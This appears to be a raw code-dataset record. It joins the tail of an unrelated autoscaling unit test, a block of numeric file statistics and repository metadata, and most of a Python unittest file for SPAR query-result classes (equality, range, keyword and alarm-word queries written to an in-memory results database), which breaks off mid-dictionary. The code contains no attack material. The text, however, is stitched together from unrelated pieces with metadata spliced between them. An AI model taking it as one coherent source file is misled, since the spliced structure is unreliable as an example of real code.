self.m.UnsetStubs()
self.m.StubOutWithMock(Metadata, '__get__')
Metadata.__get__(mox.IgnoreArg(), up_policy, mox.IgnoreArg()
).AndReturn(previous_meta)
Metadata.__get__(mox.IgnoreArg(), rsrc, mox.IgnoreArg()
).AndReturn(previous_meta)
#stub for the metadata accesses while creating the two instances
Metadata.__get__(mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg())
Metadata.__get__(mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg())
now = now + datetime.timedelta(seconds=61)
self._stub_lb_reload(4, unset=False)
self._stub_meta_expected(now, 'ChangeInCapacity : 2', 2)
self._stub_create(2)
self.m.ReplayAll()
# Trigger alarm
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1',
'WebServerGroup-2', 'WebServerGroup-3'],
rsrc.get_instance_names())
rsrc.delete()
self.m.VerifyAll()
def test_vpc_zone_identifier(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['VPCZoneIdentifier'] = ['xxxx']
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
instances = rsrc.get_instances()
self.assertEqual(1, len(instances))
self.assertEqual('xxxx', instances[0].properties['SubnetId'])
rsrc.delete()
self.m.VerifyAll()
def test_invalid_vpc_zone_identifier(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['VPCZoneIdentifier'] = ['xxxx', 'yyyy']
stack = utils.parse_stack(t, params=self.params)
self.assertRaises(exception.NotSupported, self.create_scaling_group, t,
stack, 'WebServerGroup')
| 39.056203
| 79
| 0.624607
| 6,031
| 56,983
| 5.695904
| 0.064666
| 0.025035
| 0.027306
| 0.036097
| 0.857767
| 0.836254
| 0.822689
| 0.802428
| 0.78403
| 0.757103
| 0
| 0.012207
| 0.256726
| 56,983
| 1,458
| 80
| 39.08299
| 0.798862
| 0.06716
| 0
| 0.773585
| 0
| 0
| 0.156725
| 0.026027
| 0
| 0
| 0
| 0
| 0.101527
| 1
| 0.036837
| false
| 0
| 0.018868
| 0
| 0.060198
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
12351a8b8ca417fc83e09eba6999e4a299846cd3
| 37,650
|
py
|
Python
|
spar_python/query_generation/query_result_test.py
|
nathanawmk/SPARTA
|
6eeb28b2dd147088b6e851876b36eeba3e700f16
|
[
"BSD-2-Clause"
] | 37
|
2017-06-09T13:55:23.000Z
|
2022-01-28T12:51:17.000Z
|
spar_python/query_generation/query_result_test.py
|
nathanawmk/SPARTA
|
6eeb28b2dd147088b6e851876b36eeba3e700f16
|
[
"BSD-2-Clause"
] | null | null | null |
spar_python/query_generation/query_result_test.py
|
nathanawmk/SPARTA
|
6eeb28b2dd147088b6e851876b36eeba3e700f16
|
[
"BSD-2-Clause"
] | 5
|
2017-06-09T13:55:26.000Z
|
2021-11-11T03:51:56.000Z
|
# *****************************************************************
# Copyright 2013 MIT Lincoln Laboratory
# Project: SPAR
# Authors: jill
# Description: Tests for the query results classes
# *****************************************************************
import os
import sys
this_dir = os.path.dirname(os.path.abspath(__file__))
base_dir = os.path.join(this_dir, '..', '..')
sys.path.append(base_dir)
import spar_python.query_generation.query_schema as qs
import spar_python.report_generation.ta1.ta1_schema as rdb
import spar_python.report_generation.ta1.ta1_database as ta1_database
import spar_python.query_generation.query_result as qr
import spar_python.query_generation.query_ids as qids
import unittest
class SelectStarTest(unittest.TestCase):
def setUp(self):
self.__query = { qs.QRY_CAT : 'eq',
qs.QRY_SUBCAT : '',
qs.QRY_DBNUMRECORDS : 30,
qs.QRY_DBRECORDSIZE : 1003,
qs.QRY_QID : 1,
qs.QRY_PERF : ['LL'],
qs.QRY_WHERECLAUSE : 'fname = nick',
qs.QRY_FIELD : 'FNAME',
qs.QRY_FIELDTYPE : 'string',
qs.QRY_VALUE : 'nick' }
self.__result = { qs.QRY_QID : 1,
rdb.DBF_MATCHINGRECORDIDS : set([1,3]) }
def testQueryResult(self):
qids.reset_full_qid_seen()
count = 0
for x in xrange(10):
self.__query[qs.QRY_QID]=x
query_result = qr.EqualityQueryResult(self.__query, self.__result,
None, True)
(_, full_entry, _, _) = query_result.process_query()
if full_entry[rdb.DBF_SELECTSTAR]:
count += 1
self.assertEqual(count,2)
def testPreWriteToFullTable(self):
qids.reset_full_qid_seen()
count = 0
for x in xrange(10):
self.__query[qs.QRY_QID]=x
full_entry= qr.QueryResultBase._pre_write_to_full_table(self.__query,
self.__result)
if full_entry[rdb.DBF_SELECTSTAR]:
count +=1
self.assertEqual(count,2)
class EqualityQueryResultTest(unittest.TestCase):
"""
Test that the EqualityQueryResults class acts as expected.
"""
def setUp(self):
''' setup for test '''
query1 = { qs.QRY_CAT : 'eq',
qs.QRY_SUBCAT : '',
qs.QRY_DBNUMRECORDS : 30,
qs.QRY_DBRECORDSIZE : 1003,
qs.QRY_QID : 1,
qs.QRY_PERF : ['LL'],
qs.QRY_WHERECLAUSE : 'fname = nick',
qs.QRY_FIELD : 'FNAME',
qs.QRY_FIELDTYPE : 'string',
qs.QRY_VALUE : 'nick' }
result1 = { qs.QRY_QID : 1,
rdb.DBF_MATCHINGRECORDIDS : set([1,3]) }
self.__query1 = query1
self.__result1 = result1
self.__query1_atomic_entry = \
{ rdb.DBA_AQID : query1[qs.QRY_QID],
rdb.DBA_CAT : query1[qs.QRY_CAT],
rdb.DBA_SUBCAT : query1[qs.QRY_SUBCAT],
rdb.DBA_NUMRECORDS : query1[qs.QRY_DBNUMRECORDS],
rdb.DBA_RECORDSIZE : query1[qs.QRY_DBRECORDSIZE],
rdb.DBA_WHERECLAUSE : query1[qs.QRY_WHERECLAUSE],
rdb.DBA_FIELD : query1[qs.QRY_FIELD],
rdb.DBA_FIELDTYPE : query1[qs.QRY_FIELDTYPE],
rdb.DBA_NUMMATCHINGRECORDS : 2 }
self.__query1_full_entry = \
{ rdb.DBF_FQID : 1,
rdb.DBF_CAT : query1[qs.QRY_CAT],
rdb.DBF_SUBCAT : query1[qs.QRY_SUBCAT],
rdb.DBF_IBM1SUPPORTED : "IBM1" in query1[qs.QRY_PERF],
rdb.DBF_IBM2SUPPORTED : "IBM2" in query1[qs.QRY_PERF],
rdb.DBF_COLUMBIASUPPORTED : "COL" in query1[qs.QRY_PERF],
rdb.DBF_NUMRECORDS : query1[qs.QRY_DBNUMRECORDS],
rdb.DBF_RECORDSIZE : query1[qs.QRY_DBRECORDSIZE],
rdb.DBF_WHERECLAUSE : query1[qs.QRY_WHERECLAUSE],
rdb.DBF_NUMMATCHINGRECORDS : 2,
rdb.DBF_MATCHINGRECORDIDS : set([1, 3]),
rdb.DBF_SELECTSTAR : True }
self.__query1_full_to_atomic_entry = \
{ rdb.F2A_AQID : 1, rdb.F2A_FQID : 1 }
# no matches
self.__query1_atomic_entry_no_matches = dict(self.__query1_atomic_entry)
self.__query1_atomic_entry_no_matches[rdb.DBA_NUMMATCHINGRECORDS] = 0
self.__query1_full_entry_no_matches = dict(self.__query1_full_entry)
self.__query1_full_entry_no_matches[rdb.DBF_NUMMATCHINGRECORDS] = 0
self.__query1_full_entry_no_matches[rdb.DBF_MATCHINGRECORDIDS] = set()
def test_process_repeat_query(self):
''' test process_query with repeats'''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.EqualityQueryResult(self.__query1, self.__result1,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.__query1_atomic_entry)
self.assertEqual(full_entry, self.__query1_full_entry)
self.assertEqual(full_to_atomic_entry,
self.__query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
# test again but pass in None for results
query_result = qr.EqualityQueryResult(self.__query1, None,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
self.assertEqual(atomic_entry, {})
self.assertEqual(full_entry, {})
self.assertEqual(full_to_atomic_entry, {})
self.assertEqual(full_to_full_entry, {})
def test_process_query(self):
''' test process_query '''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.EqualityQueryResult(self.__query1, self.__result1,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.__query1_atomic_entry)
self.assertEqual(full_entry, self.__query1_full_entry)
self.assertEqual(full_to_atomic_entry,
self.__query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
# test again but pass in None for results
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.EqualityQueryResult(self.__query1, None,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.__query1_atomic_entry_no_matches)
self.assertEqual(full_entry, self.__query1_full_entry_no_matches)
self.assertEqual(full_to_atomic_entry,
self.__query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
def test_write_query(self):
''' test write_query '''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
db_name = ':memory:'
db_object = ta1_database.Ta1ResultsDB(db_name)
query_result = qr.EqualityQueryResult(self.__query1, self.__result1,
db_object, True)
query_result.write_query()
db_object.close()
def test_init_method(self):
''' test __init__ method '''
query_result = qr.EqualityQueryResult(self.__query1, self.__result1,
None, True)
self.assertEqual(query_result._query, self.__query1)
self.assertEqual(query_result._result, self.__result1)
self.assertEqual(query_result._top, True)
self.assertEqual(query_result._db_object, None)
class P2QueryResultTest(unittest.TestCase):
"""
Test that the EqualityQueryResults class acts as expected.
"""
def setUp(self):
''' setup for test '''
query1 = { qs.QRY_CAT : 'P2',
qs.QRY_SUBCAT : 'foorange',
qs.QRY_DBNUMRECORDS : 3,
qs.QRY_DBRECORDSIZE : 100,
qs.QRY_QID : 1,
qs.QRY_PERF : ['LL'],
qs.QRY_WHERECLAUSE : '100 <= foo <= 500',
qs.QRY_FIELD : 'foo',
qs.QRY_FIELDTYPE : 'integer',
qs.QRY_LBOUND : 100,
qs.QRY_UBOUND : 500,
qs.QRY_RANGE : 4,
qs.QRY_RANGECOVERAGE : 400}
result1 = { qs.QRY_QID : 1,
rdb.DBF_MATCHINGRECORDIDS : set([1,3]) }
self.__query1 = query1
self.__result1 = result1
self.__query1_atomic_entry = \
{ rdb.DBA_AQID : query1[qs.QRY_QID],
rdb.DBA_CAT : query1[qs.QRY_CAT],
rdb.DBA_SUBCAT : query1[qs.QRY_SUBCAT],
rdb.DBA_NUMRECORDS : query1[qs.QRY_DBNUMRECORDS],
rdb.DBA_RECORDSIZE : query1[qs.QRY_DBRECORDSIZE],
rdb.DBA_WHERECLAUSE : query1[qs.QRY_WHERECLAUSE],
rdb.DBA_FIELD : query1[qs.QRY_FIELD],
rdb.DBA_FIELDTYPE : query1[qs.QRY_FIELDTYPE],
rdb.DBA_NUMMATCHINGRECORDS : 2,
rdb.DBA_RANGE : 4}
self.__query1_full_entry = \
{ rdb.DBF_FQID : 1,
rdb.DBF_CAT : query1[qs.QRY_CAT],
rdb.DBF_SUBCAT : query1[qs.QRY_SUBCAT],
rdb.DBF_IBM1SUPPORTED : "IBM1" in query1[qs.QRY_PERF],
rdb.DBF_IBM2SUPPORTED : "IBM2" in query1[qs.QRY_PERF],
rdb.DBF_COLUMBIASUPPORTED : "COL" in query1[qs.QRY_PERF],
rdb.DBF_NUMRECORDS : query1[qs.QRY_DBNUMRECORDS],
rdb.DBF_RECORDSIZE : query1[qs.QRY_DBRECORDSIZE],
rdb.DBF_WHERECLAUSE : query1[qs.QRY_WHERECLAUSE],
rdb.DBF_NUMMATCHINGRECORDS : 2,
rdb.DBF_SELECTSTAR : True,
rdb.DBF_MATCHINGRECORDIDS : set([1, 3]) }
self.__query1_full_to_atomic_entry = \
{ rdb.F2A_AQID : 1, rdb.F2A_FQID : 1 }
# no matches
self.__query1_atomic_entry_no_matches = dict(self.__query1_atomic_entry)
self.__query1_atomic_entry_no_matches[rdb.DBA_NUMMATCHINGRECORDS] = 0
self.__query1_full_entry_no_matches = dict(self.__query1_full_entry)
self.__query1_full_entry_no_matches[rdb.DBF_NUMMATCHINGRECORDS] = 0
self.__query1_full_entry_no_matches[rdb.DBF_MATCHINGRECORDIDS] = set()
def test_process_repeat_query(self):
''' test process_query with repeats'''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.P2QueryResult(self.__query1, self.__result1,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.__query1_atomic_entry)
self.assertEqual(full_entry, self.__query1_full_entry)
self.assertEqual(full_to_atomic_entry,
self.__query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
# test again but pass in None for results
query_result = qr.P2QueryResult(self.__query1, None,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
self.assertEqual(atomic_entry, {})
self.assertEqual(full_entry, {})
self.assertEqual(full_to_atomic_entry, {})
self.assertEqual(full_to_full_entry, {})
def test_process_query(self):
''' test process_query '''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.P2QueryResult(self.__query1, self.__result1,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.__query1_atomic_entry)
self.assertEqual(full_entry, self.__query1_full_entry)
self.assertEqual(full_to_atomic_entry,
self.__query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
# test again but pass in None for results
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.P2QueryResult(self.__query1, None,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.__query1_atomic_entry_no_matches)
self.assertEqual(full_entry, self.__query1_full_entry_no_matches)
self.assertEqual(full_to_atomic_entry,
self.__query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
def test_write_query(self):
''' test write_query '''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
db_name = ':memory:'
db_object = ta1_database.Ta1ResultsDB(db_name)
query_result = qr.P2QueryResult(self.__query1, self.__result1,
db_object, True)
query_result.write_query()
db_object.close()
def test_init_method(self):
''' test __init__ method '''
query_result = qr.P2QueryResult(self.__query1, self.__result1,
None, True)
self.assertEqual(query_result._query, self.__query1)
self.assertEqual(query_result._result, self.__result1)
self.assertEqual(query_result._top, True)
self.assertEqual(query_result._db_object, None)
class P3P4P6P7QueryResultTest(unittest.TestCase):
"""
Test that the P3P4P6P7QueryResult class acts as expected.
"""
def setUp(self):
''' setup for test '''
query1 = { qs.QRY_CAT : 'P3',
qs.QRY_SUBCAT : '',
qs.QRY_DBNUMRECORDS : 3,
qs.QRY_DBRECORDSIZE : 100,
qs.QRY_PERF : ['LL'],
qs.QRY_QID : 1,
qs.QRY_WHERECLAUSE : "CONTAINED_IN(notes1, ''dog\''')",
qs.QRY_FIELD : 'notes1',
qs.QRY_FIELDTYPE : 'text',
qs.QRY_SEARCHFOR : 'dogs',
qs.QRY_KEYWORDLEN : 4 }
result1 = { qs.QRY_QID : 1,
rdb.DBF_MATCHINGRECORDIDS : set([1,3]) }
self.__query1 = query1
self.__result1 = result1
self.__query1_atomic_entry = \
{ rdb.DBA_AQID : query1[qs.QRY_QID],
rdb.DBA_CAT : query1[qs.QRY_CAT],
rdb.DBA_SUBCAT : query1[qs.QRY_SUBCAT],
rdb.DBA_NUMRECORDS : query1[qs.QRY_DBNUMRECORDS],
rdb.DBA_RECORDSIZE : query1[qs.QRY_DBRECORDSIZE],
rdb.DBA_WHERECLAUSE : query1[qs.QRY_WHERECLAUSE],
rdb.DBA_FIELD : query1[qs.QRY_FIELD],
rdb.DBA_FIELDTYPE : query1[qs.QRY_FIELDTYPE],
rdb.DBA_NUMMATCHINGRECORDS : 2,
rdb.DBA_KEYWORDLEN : query1[qs.QRY_KEYWORDLEN]}
self.__query1_full_entry = \
{ rdb.DBF_FQID : 1,
rdb.DBF_CAT : query1[qs.QRY_CAT],
rdb.DBF_SUBCAT : query1[qs.QRY_SUBCAT],
rdb.DBF_IBM1SUPPORTED : "IBM1" in query1[qs.QRY_PERF],
rdb.DBF_IBM2SUPPORTED : "IBM2" in query1[qs.QRY_PERF],
rdb.DBF_COLUMBIASUPPORTED : "COL" in query1[qs.QRY_PERF],
rdb.DBF_NUMRECORDS : query1[qs.QRY_DBNUMRECORDS],
rdb.DBF_RECORDSIZE : query1[qs.QRY_DBRECORDSIZE],
rdb.DBF_WHERECLAUSE : query1[qs.QRY_WHERECLAUSE],
rdb.DBF_NUMMATCHINGRECORDS : 2,
rdb.DBF_SELECTSTAR : True,
rdb.DBF_MATCHINGRECORDIDS : set([1, 3]) }
self.__query1_full_to_atomic_entry = \
{ rdb.F2A_AQID : 1, rdb.F2A_FQID : 1 }
# no matches
self.__query1_atomic_entry_no_matches = dict(self.__query1_atomic_entry)
self.__query1_atomic_entry_no_matches[rdb.DBA_NUMMATCHINGRECORDS] = 0
self.__query1_full_entry_no_matches = dict(self.__query1_full_entry)
self.__query1_full_entry_no_matches[rdb.DBF_NUMMATCHINGRECORDS] = 0
self.__query1_full_entry_no_matches[rdb.DBF_MATCHINGRECORDIDS] = set()
def test_process_repeat_query(self):
''' test process_query with repeats'''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.P3P4P6P7QueryResult(self.__query1, self.__result1,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.__query1_atomic_entry)
self.assertEqual(full_entry, self.__query1_full_entry)
self.assertEqual(full_to_atomic_entry,
self.__query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
# test again but pass in None for results
query_result = qr.P3P4P6P7QueryResult(self.__query1, None,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
self.assertEqual(atomic_entry, {})
self.assertEqual(full_entry, {})
self.assertEqual(full_to_atomic_entry, {})
self.assertEqual(full_to_full_entry, {})
def test_process_query(self):
''' test process_query '''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.P3P4P6P7QueryResult(self.__query1, self.__result1,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.__query1_atomic_entry)
self.assertEqual(full_entry, self.__query1_full_entry)
self.assertEqual(full_to_atomic_entry,
self.__query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
# test again but pass in None for results
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.P3P4P6P7QueryResult(self.__query1, None,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.__query1_atomic_entry_no_matches)
self.assertEqual(full_entry, self.__query1_full_entry_no_matches)
self.assertEqual(full_to_atomic_entry,
self.__query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
def test_write_query(self):
''' test write_query '''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
db_name = ':memory:'
db_object = ta1_database.Ta1ResultsDB(db_name)
query_result = qr.P3P4P6P7QueryResult(self.__query1, self.__result1,
db_object, True)
query_result.write_query()
db_object.close()
def test_init_method(self):
''' test __init__ method '''
query_result = qr.P3P4P6P7QueryResult(self.__query1, self.__result1,
None, True)
self.assertEqual(query_result._query, self.__query1)
self.assertEqual(query_result._result, self.__result1)
self.assertEqual(query_result._top, True)
self.assertEqual(query_result._db_object, None)
class P9AlarmQueryResultTest(unittest.TestCase):
"""
Test that the EqualityQueryResults class acts as expected.
"""
def setUp(self):
''' setup for test '''
self.query1 = { qs.QRY_QID : 1,
qs.QRY_DBNUMRECORDS : 1000,
qs.QRY_DBRECORDSIZE : 100,
qs.QRY_CAT : 'P9',
qs.QRY_PERF : ['LL'],
qs.QRY_ENUM : qs.CAT.P9_ALARM_WORDS,
qs.QRY_SUBCAT : "alarmwords",
qs.QRY_WHERECLAUSE : "alarm_words_distance(''outgrabe'', ''raths'') < 50",
qs.QRY_FIELD : 'notes3',
qs.QRY_NEGATE : False,
qs.QRY_FIELDTYPE : 'string',
qs.QRY_LRSS : 1,
qs.QRY_URSS : 10,
qs.QRY_ALARMWORDONE : 'outgrabe',
qs.QRY_ALARMWORDTWO : 'raths',
qs.QRY_ALARMWORDDISTANCE : 50}
self.result1 = {'matching_record_counts': '1|1|2|2',
'qid': 1,
'alarmword_matching_row_id_and_distances':
[(1, 22), (2, 19), (3, 50),
(4, 25), (5, 25), (6, 50)],
'matching_record_ids': [2,1,4,5,3,6]}
self.query1_atomic_entry = \
{ rdb.DBA_AQID : self.query1[qs.QRY_QID],
rdb.DBA_CAT : self.query1[qs.QRY_CAT],
rdb.DBA_SUBCAT : self.query1[qs.QRY_SUBCAT],
rdb.DBA_NUMRECORDS : self.query1[qs.QRY_DBNUMRECORDS],
rdb.DBA_RECORDSIZE : self.query1[qs.QRY_DBRECORDSIZE],
rdb.DBA_WHERECLAUSE : self.query1[qs.QRY_WHERECLAUSE],
rdb.DBA_FIELD : self.query1[qs.QRY_FIELD],
rdb.DBA_FIELDTYPE : self.query1[qs.QRY_FIELDTYPE],
rdb.DBA_NUMMATCHINGRECORDS : 6 }
self.query1_full_entry = \
{ rdb.DBF_FQID : 1,
rdb.DBF_CAT : self.query1[qs.QRY_CAT],
rdb.DBF_SUBCAT : self.query1[qs.QRY_SUBCAT],
rdb.DBF_IBM1SUPPORTED : "IBM1" in self.query1[qs.QRY_PERF],
rdb.DBF_IBM2SUPPORTED : "IBM2" in self.query1[qs.QRY_PERF],
rdb.DBF_COLUMBIASUPPORTED : "COL" in self.query1[qs.QRY_PERF],
rdb.DBF_NUMRECORDS : self.query1[qs.QRY_DBNUMRECORDS],
rdb.DBF_RECORDSIZE : self.query1[qs.QRY_DBRECORDSIZE],
rdb.DBF_WHERECLAUSE : self.query1[qs.QRY_WHERECLAUSE],
rdb.DBF_NUMMATCHINGRECORDS : 6,
rdb.DBF_MATCHINGRECORDIDS : [2,1,4,5,3,6],
rdb.DBF_SELECTSTAR : True,
rdb.DBF_P9MATCHINGRECORDCOUNTS : '1|1|2|2' }
self.query1_full_to_atomic_entry = \
{ rdb.F2A_AQID : 1, rdb.F2A_FQID : 1 }
# no matches
self.query1_atomic_entry_no_matches = dict(self.query1_atomic_entry)
self.query1_atomic_entry_no_matches[rdb.DBA_NUMMATCHINGRECORDS] = 0
self.query1_full_entry_no_matches = dict(self.query1_full_entry)
self.query1_full_entry_no_matches[rdb.DBF_NUMMATCHINGRECORDS] = 0
self.query1_full_entry_no_matches[rdb.DBF_MATCHINGRECORDIDS] = []
def test_process_repeat_query(self):
''' test process_query with repeats'''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.P9AlarmQueryResult(self.query1, self.result1,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.query1_atomic_entry)
self.assertEqual(full_entry, self.query1_full_entry)
self.assertEqual(full_to_atomic_entry,
self.query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
# test again but pass in None for results
query_result = qr.EqualityQueryResult(self.query1, None,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
self.assertEqual(atomic_entry, {})
self.assertEqual(full_entry, {})
self.assertEqual(full_to_atomic_entry, {})
self.assertEqual(full_to_full_entry, {})
def test_process_query(self):
''' test process_query '''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.P9AlarmQueryResult(self.query1, self.result1,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.query1_atomic_entry)
self.assertEqual(full_entry, self.query1_full_entry)
self.assertEqual(full_to_atomic_entry,
self.query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
def test_write_query(self):
''' test write_query '''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
db_name = ':memory:'
db_object = ta1_database.Ta1ResultsDB(db_name)
query_result = qr.P9AlarmQueryResult(self.query1, self.result1,
db_object, True)
query_result.write_query()
db_object.close()
def test_init_method(self):
''' test __init__ method '''
query_result = qr.P9AlarmQueryResult(self.query1, self.result1,
None, True)
self.assertEqual(query_result._query, self.query1)
self.assertEqual(query_result._result, self.result1)
self.assertEqual(query_result._top, True)
self.assertEqual(query_result._db_object, None)
class StaticMethodsTest(unittest.TestCase):
"""
Test that the QueryResultBase static methods act as expected.
"""
def setUp(self):
''' setup for test '''
self._query1 = { qs.QRY_CAT : 'P1',
qs.QRY_SUBCAT : 'eq_and',
qs.QRY_ENUM : qs.CAT.P1_EQ_AND,
qs.QRY_DBNUMRECORDS : 30,
qs.QRY_DBRECORDSIZE : 1003,
qs.QRY_QID : 1,
qs.QRY_PERF : ['LL'],
qs.QRY_WHERECLAUSE : 'fname = nick AND lname = jones',
qs.QRY_NUMTERMSPERCLAUSE : 3,
qs.QRY_NUMCLAUSES : 2 }
sub_result1 = { qs.QRY_QID : 2,
rdb.DBF_MATCHINGRECORDIDS : set([1,3]) }
sub_result2 = { qs.QRY_QID : 3,
rdb.DBF_MATCHINGRECORDIDS : set([1,3,5]) }
self._result1 = \
{ qs.QRY_QID : 1,
rdb.DBF_MATCHINGRECORDIDS : set([1,3]),
qs.QRY_NUMRECORDSMATCHINGFIRSTTERM : 2,
qs.QRY_SUBRESULTS : [sub_result1, sub_result2]
}
self._query2 = { qs.QRY_CAT : 'P1',
qs.QRY_SUBCAT : 'eq_not',
qs.QRY_ENUM : qs.CAT.P1_EQ_NOT,
qs.QRY_DBNUMRECORDS : 30,
qs.QRY_DBRECORDSIZE : 1003,
qs.QRY_QID : 2,
qs.QRY_WHERECLAUSE : 'NOT(fname = nick) AND NOT(lname = jones)',
qs.QRY_PERF : ["LL"],
qs.QRY_NEGATEDTERMS : set([0,1]),
qs.QRY_NUMTERMSPERCLAUSE : 3,
qs.QRY_NUMCLAUSES : 2 }
self._result2 = \
{ qs.QRY_QID : 2,
rdb.DBF_MATCHINGRECORDIDS : set([1,3]),
qs.QRY_NUMRECORDSMATCHINGFIRSTTERM : 2,
rdb.DBF_P1NEGATEDTERM : set([0,1]),
qs.QRY_SUBRESULTS : [sub_result1, sub_result2]
}
def test_pre_write_to_full_table_q1(self):
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
entry = qr.QueryResultBase._pre_write_to_full_table(self._query1,
self._result1)
matching_record_ids = self._result1[rdb.DBF_MATCHINGRECORDIDS]
matching_records = len(matching_record_ids)
gold = \
{ rdb.DBF_FQID : self._query1[qs.QRY_QID],
rdb.DBF_CAT : self._query1[qs.QRY_CAT],
rdb.DBF_SUBCAT : self._query1[qs.QRY_SUBCAT],
rdb.DBF_NUMRECORDS : self._query1[qs.QRY_DBNUMRECORDS],
rdb.DBF_RECORDSIZE : self._query1[qs.QRY_DBRECORDSIZE],
rdb.DBF_WHERECLAUSE : self._query1[qs.QRY_WHERECLAUSE],
rdb.DBF_IBM1SUPPORTED : "IBM1" in self._query1[qs.QRY_PERF],
rdb.DBF_IBM2SUPPORTED : "IBM2" in self._query1[qs.QRY_PERF],
rdb.DBF_COLUMBIASUPPORTED : "COL" in self._query1[qs.QRY_PERF],
rdb.DBF_NUMMATCHINGRECORDS : matching_records,
rdb.DBF_MATCHINGRECORDIDS : matching_record_ids,
rdb.DBF_P1NUMTERMSPERCLAUSE :
self._query1[qs.QRY_NUMTERMSPERCLAUSE],
rdb.DBF_P1NUMCLAUSES : self._query1[qs.QRY_NUMCLAUSES],
rdb.DBF_P1ANDNUMRECORDSMATCHINGFIRSTTERM : \
self._result1[qs.QRY_NUMRECORDSMATCHINGFIRSTTERM] }
gold[rdb.DBF_SELECTSTAR] = entry[rdb.DBF_SELECTSTAR]
self.assertEqual(entry, gold)
def test_pre_write_to_full_table_q2(self):
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
entry = qr.QueryResultBase._pre_write_to_full_table(self._query2,
self._result2)
matching_record_ids = self._result2[rdb.DBF_MATCHINGRECORDIDS]
matching_records = len(matching_record_ids)
gold = \
{ rdb.DBF_FQID : self._query2[qs.QRY_QID],
rdb.DBF_CAT : self._query2[qs.QRY_CAT],
rdb.DBF_SUBCAT : self._query2[qs.QRY_SUBCAT],
rdb.DBF_NUMRECORDS : self._query2[qs.QRY_DBNUMRECORDS],
